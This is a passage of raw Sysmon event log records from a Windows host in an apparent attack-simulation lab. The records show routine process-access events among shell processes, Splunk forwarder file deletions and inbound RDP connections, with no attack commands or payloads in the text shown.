10341000x80000000000000001056406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8D2A-6151-9600-00000000FD01}46325756C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.920{5EBD8912-8D2A-6151-9600-00000000FD01}46325756C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.905{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+23084|C:\Windows\System32\TwinUI.dll+23138|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+15bffd|C:\Windows\System32\TwinUI.dll+ced8f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.905{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+230ec|C:\Windows\System32\TwinUI.dll+23125|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+15bffd|C:\Windows\System32\TwinUI.dll+ced8f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056397Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.795{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B72CA9BA96CE75304808D26F618DF94,SHA256=7EC80174F5E545D4A8527883A431BFBFCAB96127C2DCCD33BB7C38EB2F1106AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056396Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.483{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFDCD8595E1D442AB72A90658E0AB87,SHA256=7EDAF6FA0159D082C2BAB4377948898039CC3F7582D62381C83D956700A52C47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056395Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.006{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-59109-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056394Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.241{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de59011-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001056393Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056392Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.233{5EBD8912-8D29-6151-8D00-00000000FD01}41364504C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.170{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.170{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.170{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.170{5EBD8912-8CD0-6151-2C00-00000000FD01}24243128C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\